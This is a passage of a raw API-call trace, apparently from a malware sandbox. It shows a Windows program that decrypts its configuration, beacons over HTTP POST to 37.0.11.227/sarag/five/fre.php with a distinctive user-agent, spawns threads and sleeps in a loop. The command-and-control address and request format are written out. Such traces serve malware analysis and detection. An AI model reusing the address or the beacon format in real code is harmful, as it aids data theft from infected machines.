(lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0271.148] GetProcessHeap () returned 0x690000 [0271.148] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x20) returned 0x6a3088 [0271.148] getaddrinfo (in: pNodeName="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0271.148] GetProcessHeap () returned 0x690000 [0271.149] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a3088 | out: hHeap=0x690000) returned 1 [0271.149] GetProcessHeap () returned 0x690000 [0271.149] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x698528 | out: hHeap=0x690000) returned 1 [0271.149] GetProcessHeap () returned 0x690000 [0271.150] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4418 | out: hHeap=0x690000) returned 1 [0271.150] GetProcessHeap () returned 0x690000 [0271.150] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x40) returned 0x6a4730 [0271.151] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0271.151] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0271.157] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0271.158] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6af188) returned 1 [0271.166] GetProcessHeap () returned 0x690000 [0271.166] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x24) returned 0x6a88e0 [0271.167] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0271.167] CryptImportKey (in: hProv=0x6af188, pbData=0x6a88e0, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x69d5e8) returned 1 [0271.168] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0271.168] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0271.169] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0271.169] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0271.169] GetProcessHeap () returned 0x690000 [0271.170] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a88e0 | out: hHeap=0x690000) returned 1 [0271.170] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0271.171] CryptDecrypt (in: hKey=0x69d5e8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6a4730, pdwDataLen=0x19fcfc | out: pbData=0x6a4730, pdwDataLen=0x19fcfc) returned 1 [0271.171] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0271.171] CryptDestroyKey (hKey=0x69d5e8) returned 1 [0271.174] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0271.174] CryptReleaseContext (hProv=0x6af188, dwFlags=0x0) returned 1 [0271.174] GetProcessHeap () returned 0x690000 [0271.174] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x212) returned 0x698528 [0271.175] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0271.176] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="http://") returned 0x0 [0271.176] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0271.177] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="https://") returned 0x0 [0271.177] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0271.178] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="/") returned="/sarag/five/fre.php" [0271.178] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0271.179] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch=":") returned 0x0 [0271.179] GetProcessHeap () returned 0x690000 [0271.179] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x20) returned 0x6a2f20 [0271.179] getaddrinfo (in: pNodeName="37.0.11.227", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x6a31f0*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6aeb50*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), ai_next=0x0)) returned 0 [0271.179] GetProcessHeap () returned 0x690000 [0271.179] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x4) returned 0x6ab370 [0271.179] socket (af=2, type=1, protocol=6) returned 0x828 [0271.180] connect (s=0x828, name=0x6aeb50*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), namelen=16) returned 0 [0271.207] FreeAddrInfoW (pAddrInfo=0x6a31f0*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6aeb50*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), ai_next=0x0)) [0271.207] GetProcessHeap () returned 0x690000 [0271.207] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x7d) returned 0x6aecc0 [0271.207] GetProcessHeap () returned 0x690000 [0271.207] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x201b) returned 0x6b97c0 [0271.208] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0271.209] wvsprintfA (in: param_1=0x6b97c0, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /sarag/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 37.0.11.227\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 177 [0271.209] GetProcessHeap () returned 0x690000 [0271.209] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xb3) returned 0x6afa40 [0271.209] GetProcessHeap () returned 0x690000 [0271.209] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b97c0 | out: hHeap=0x690000) returned 1 [0271.209] GetProcessHeap () returned 0x690000 [0271.209] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x3e) returned 0x6a4418 [0271.209] GetProcessHeap () returned 0x690000 [0271.209] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x1fdc) returned 0x6b97c0 [0271.210] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0271.211] wvsprintfA (in: param_1=0x6b97c0, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /sarag/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 37.0.11.227\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 4E024674\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 242 [0271.211] GetProcessHeap () returned 0x690000 [0271.211] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xf4) returned 0x6ad508 [0271.211] GetProcessHeap () returned 0x690000 [0271.211] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b97c0 | out: hHeap=0x690000) returned 1 [0271.211] send (s=0x828, buf=0x6ad508*, len=242, flags=0) returned 242 [0271.211] send (s=0x828, buf=0x6aba40*, len=159, flags=0) returned 159 [0271.212] GetProcessHeap () returned 0x690000 [0271.212] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xfd0) returned 0x6b2fb8 [0271.212] recv (in: s=0x828, buf=0x6b2fb8, len=4048, flags=0 | out: buf=0x6b2fb8*) returned 204 [0271.300] GetProcessHeap () returned 0x690000 [0271.300] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ad508 | out: hHeap=0x690000) returned 1 [0271.302] GetProcessHeap () returned 0x690000 [0271.303] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4418 | out: hHeap=0x690000) returned 1 [0271.303] GetProcessHeap () returned 0x690000 [0271.303] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6afa40 | out: hHeap=0x690000) returned 1 [0271.303] GetProcessHeap () returned 0x690000 [0271.304] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6aecc0 | out: hHeap=0x690000) returned 1 [0271.304] closesocket (s=0x828) returned 0 [0271.305] GetProcessHeap () returned 0x690000 [0271.305] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ab370 | out: hHeap=0x690000) returned 1 [0271.305] GetProcessHeap () returned 0x690000 [0271.305] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x698528 | out: hHeap=0x690000) returned 1 [0271.306] GetProcessHeap () returned 0x690000 [0271.306] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4730 | out: hHeap=0x690000) returned 1 [0271.306] GetProcessHeap () returned 0x690000 [0271.307] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a2f20 | out: hHeap=0x690000) returned 1 [0271.308] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x6b2fb8, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0x15dc) returned 0x828 [0271.315] Sleep (dwMilliseconds=0xea60) [0271.316] GetProcessHeap () returned 0x690000 [0271.316] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x40) returned 0x6a4730 [0271.317] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0271.318] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0271.330] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0271.331] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6aee58) returned 1 [0271.343] GetProcessHeap () returned 0x690000 [0271.343] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x24) returned 0x6a8a30 [0271.344] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0271.345] CryptImportKey (in: hProv=0x6aee58, pbData=0x6a8a30, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x69d5e8) returned 1 [0271.353] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0271.354] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0271.355] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0271.358] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0271.358] GetProcessHeap () returned 0x690000 [0271.358] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a8a30 | out: hHeap=0x690000) returned 1 [0271.359] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0271.360] CryptDecrypt (in: hKey=0x69d5e8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6a4730, pdwDataLen=0x19fcfc | out: pbData=0x6a4730, pdwDataLen=0x19fcfc) returned 1 [0271.360] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0271.361] CryptDestroyKey (hKey=0x69d5e8) returned 1 [0271.361] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0271.362] CryptReleaseContext (hProv=0x6aee58, dwFlags=0x0) returned 1 [0271.362] GetProcessHeap () returned 0x690000 [0271.362] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x212) returned 0x698528 [0271.363] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0271.363] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0271.364] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0271.364] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0271.365] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0271.366] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0271.369] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0271.369] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0271.369] GetProcessHeap () returned 0x690000 [0271.369] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x20) returned 0x6a2f20 [0271.369] getaddrinfo (in: pNodeName="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0271.370] GetProcessHeap () returned 0x690000 [0271.371] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a2f20 | out: hHeap=0x690000) returned 1 [0271.371] GetProcessHeap () returned 0x690000 [0271.371] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x698528 | out: hHeap=0x690000) returned 1 [0271.371] GetProcessHeap () returned 0x690000 [0271.371] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4730 | out: hHeap=0x690000) returned 1 [0271.371] GetProcessHeap () returned 0x690000 [0271.371] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x40) returned 0x6a4340 [0271.372] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0271.373] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0271.379] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0271.380] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6aecc0) returned 1 [0271.387] GetProcessHeap () returned 0x690000 [0271.387] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x24) returned 0x6a8820 [0271.391] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0271.392] CryptImportKey (in: hProv=0x6aecc0, pbData=0x6a8820, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x69d5e8) returned 1 [0271.393] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0271.394] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0271.395] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0271.395] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0271.395] GetProcessHeap () returned 0x690000 [0271.396] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a8820 | out: hHeap=0x690000) returned 1 [0271.397] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0271.397] CryptDecrypt (in: hKey=0x69d5e8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6a4340, pdwDataLen=0x19fcfc | out: pbData=0x6a4340, pdwDataLen=0x19fcfc) returned 1 [0271.407] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0271.408] CryptDestroyKey (hKey=0x69d5e8) returned 1 [0271.408] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0271.409] CryptReleaseContext (hProv=0x6aecc0, dwFlags=0x0) returned 1 [0271.409] GetProcessHeap () returned 0x690000 [0271.409] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x212) returned 0x698528 [0271.410] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0271.410] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="http://") returned 0x0 [0271.411] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0271.411] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="https://") returned 0x0 [0271.412] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0271.413] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="/") returned="/sarag/five/fre.php" [0271.413] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0271.414] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch=":") returned 0x0 [0271.414] GetProcessHeap () returned 0x690000 [0271.414] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x20) returned 0x6a31f0 [0271.414] getaddrinfo (in: pNodeName="37.0.11.227", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x6a2f48*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6aeb50*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), ai_next=0x0)) returned 0 [0271.414] GetProcessHeap () returned 0x690000 [0271.414] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x4) returned 0x6ab480 [0271.414] socket (af=2, type=1, protocol=6) returned 0x82c [0271.414] connect (s=0x82c, name=0x6aeb50*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), namelen=16) returned 0 [0271.443] FreeAddrInfoW (pAddrInfo=0x6a2f48*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6aeb50*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), ai_next=0x0)) [0271.443] GetProcessHeap () returned 0x690000 [0271.443] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x7d) returned 0x6af188 [0271.443] GetProcessHeap () returned 0x690000 [0271.443] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x201b) returned 0x6b97c0 [0271.443] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0271.444] wvsprintfA (in: param_1=0x6b97c0, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /sarag/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 37.0.11.227\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 177 [0271.445] GetProcessHeap () returned 0x690000 [0271.445] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xb3) returned 0x6afec0 [0271.445] GetProcessHeap () returned 0x690000 [0271.445] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b97c0 | out: hHeap=0x690000) returned 1 [0271.445] GetProcessHeap () returned 0x690000 [0271.445] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x3e) returned 0x6a4418 [0271.445] GetProcessHeap () returned 0x690000 [0271.445] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x1fdc) returned 0x6b97c0 [0271.446] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0271.447] wvsprintfA (in: param_1=0x6b97c0, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /sarag/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 37.0.11.227\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 4E024674\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 242 [0271.447] GetProcessHeap () returned 0x690000 [0271.447] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xf4) returned 0x6ad508 [0271.447] GetProcessHeap () returned 0x690000 [0271.448] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b97c0 | out: hHeap=0x690000) returned 1 [0271.448] send (s=0x82c, buf=0x6ad508*, len=242, flags=0) returned 242 [0271.449] send (s=0x82c, buf=0x6aba40*, len=159, flags=0) returned 159 [0271.449] GetProcessHeap () returned 0x690000 [0271.449] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xfd0) returned 0x6b2fb8 [0271.449] recv (in: s=0x82c, buf=0x6b2fb8, len=4048, flags=0 | out: buf=0x6b2fb8*) returned 204 [0271.526] GetProcessHeap () returned 0x690000 [0271.527] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ad508 | out: hHeap=0x690000) returned 1 [0271.527] GetProcessHeap () returned 0x690000 [0271.527] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4418 | out: hHeap=0x690000) returned 1 [0271.527] GetProcessHeap () returned 0x690000 [0271.528] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6afec0 | out: hHeap=0x690000) returned 1 [0271.530] GetProcessHeap () returned 0x690000 [0271.530] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6af188 | out: hHeap=0x690000) returned 1 [0271.530] closesocket (s=0x82c) returned 0 [0271.531] GetProcessHeap () returned 0x690000 [0271.531] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ab480 | out: hHeap=0x690000) returned 1 [0271.531] GetProcessHeap () returned 0x690000 [0271.531] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x698528 | out: hHeap=0x690000) returned 1 [0271.532] GetProcessHeap () returned 0x690000 [0271.532] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4340 | out: hHeap=0x690000) returned 1 [0271.532] GetProcessHeap () returned 0x690000 [0271.533] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a31f0 | out: hHeap=0x690000) returned 1 [0271.533] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x6b2fb8, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0x15e0) returned 0x82c [0271.535] Sleep (dwMilliseconds=0xea60) [0271.536] GetProcessHeap () returned 0x690000 [0271.536] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x40) returned 0x6a4418 [0271.542] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0271.542] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0271.554] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0271.555] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6af188) returned 1 [0271.565] GetProcessHeap () returned 0x690000 [0271.565] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x24) returned 0x6a88b0 [0271.570] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0271.570] CryptImportKey (in: hProv=0x6af188, pbData=0x6a88b0, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x69d028) returned 1 [0271.571] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0271.572] CryptSetKeyParam (hKey=0x69d028, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0271.573] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0271.573] CryptSetKeyParam (hKey=0x69d028, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0271.573] GetProcessHeap () returned 0x690000 [0271.574] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a88b0 | out: hHeap=0x690000) returned 1 [0271.575] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0271.575] CryptDecrypt (in: hKey=0x69d028, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6a4418, pdwDataLen=0x19fcfc | out: pbData=0x6a4418, pdwDataLen=0x19fcfc) returned 1 [0271.588] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0271.588] CryptDestroyKey (hKey=0x69d028) returned 1 [0271.589] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0271.589] CryptReleaseContext (hProv=0x6af188, dwFlags=0x0) returned 1 [0271.589] GetProcessHeap () returned 0x690000 [0271.589] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x212) returned 0x698528 [0271.590] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0271.591] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0271.591] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0271.592] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0271.593] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0271.595] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0271.596] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0271.597] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0271.597] GetProcessHeap () returned 0x690000 [0271.597] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x20) returned 0x6a2f20 [0271.597] getaddrinfo (in: pNodeName="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0271.597] GetProcessHeap () returned 0x690000 [0271.598] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a2f20 | out: hHeap=0x690000) returned 1 [0271.598] GetProcessHeap () returned 0x690000 [0271.598] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x698528 | out: hHeap=0x690000) returned 1 [0271.598] GetProcessHeap () returned 0x690000 [0271.599] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4418 | out: hHeap=0x690000) returned 1 [0271.599] GetProcessHeap () returned 0x690000 [0271.599] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x40) returned 